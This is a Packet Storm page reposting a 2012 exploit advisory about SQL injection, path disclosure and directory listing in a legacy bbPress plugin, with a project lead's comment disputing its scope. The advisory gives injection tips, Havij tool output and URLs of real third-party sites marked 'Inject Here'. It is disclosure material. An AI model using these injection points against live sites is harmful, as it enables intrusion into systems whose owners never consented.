what you don't know can hurt you

WordPress BBPress SQL Injection / Path Disclosure

WordPress BBPress SQL Injection / Path Disclosure
Posted Aug 31, 2012
Authored by Dark-Puzzle

The WordPress BBPress third party plugin suffers from path disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
MD5 | ee59ac0508c0fe04fde47049dc5864ea

WordPress BBPress SQL Injection / Path Disclosure

Change Mirror Download
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [x] Official Website: http://www.1337day.com 0
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
# 0 0
# 1 ========================================== 1
# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
# 0 1
# 1 dark-puzzle[at]live[at]fr 0
# 0 ========================================== 1
# 1 White Hat 1
# 0 Independant Pentester 0
# 1 exploit coder/bug researcher 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

# Exploit Title: Wordpress plugins - bbpress Multiple Vulnerabilities.
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Vendor Website : www.bbpress.ru / www.bbpress.com
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 R3 .
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...

----------------------------------------------------
I - SQL Injection Vulnerability :
----------------------------------------------------
bbpress plugin is prone to an SQL injection Vulnerability .
In cases when you face a valid string column problem try to change syntax or instead spaces add /**/ .

Note: Automated injection can be more effective .

Proof : ( take Havij for example)

Host IP: 127.0.0.1
Web Server: Apache
Keyword Found: bb
Injection type is Integer
Keyword corrected: 0.062
DB Server: MySQL unknown ver
Trying another method using keyword for finding columns count
Selected Column Count is 12
trying to find string column
Valid String Column is 3
Current DB: test_db

Example Sites :
http://marcoemarco.altervista.org/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject Here]
http://www.compagniealluna.com/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here]

---------------------------------------------------
II - Full Disclosure Vulnerability :
---------------------------------------------------

The Full Path Disclosure vulnerability in bbpress is via Array .

Example :

www.example.com/path/bbpress/topic.php?id[]=12&replies=3

Error : Warning: urlencode() expects parameter 1 to be string, array given in /Full/Path/Here on line 786

Live Example Sites :

http://www.compagniealluna.com/wp-content/plugins/bbpress/topic.php?id[]=1017&replies=1
http://kghf.ru/wp-content/plugins/bbpress/topic.php?id[]=70&replies=1
http://tg.elsendorf.de/wp/wp-content/plugins/bbpress/topic.php?id[]=501&replies=1
http://tg.elsendorf.de/wp/wp-content/plugins/bbpress/forum.php?id[]=1

---------------------------------------------------
III - Directory Listing Vulnerability :
---------------------------------------------------

www.example.com/PATH/bbpress/bb-templates/kakumei/
www.example.com/PATH/bbpress/bb-templates/kakumei-blue/

---------------------------------------------------
# Datasec Team





Comments (1)

RSS Feed Subscribe to this comment feed
johnjamesjacoby

bbPress project lead chiming in here, since reports are still coming in about this...

Duplicating these 3 scenarios requires installing a 3 year old version of bbPress in a way it was never intended to be -- inside of WordPress's /wp-content/ folder -- and also without proper server permissions on the /plugins directory.

In 2010, bbPress 2.0 was re-released as a dedicated WordPress plugin. bbPress 2.0 and newer (2.3 at the time of this writing) do not suffer from the vulnerabilities mentioned above.

That said, we've continued to maintain legacy 1.x versions of bbPress, and in November 2012 released version 1.2 that addresses other, valid issues. You can view that changelog here: bbpress.trac.wordpress.org/log/branches/1.1

Thanks everyone!

Comment by johnjamesjacoby
2013-06-06 01:35:26 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close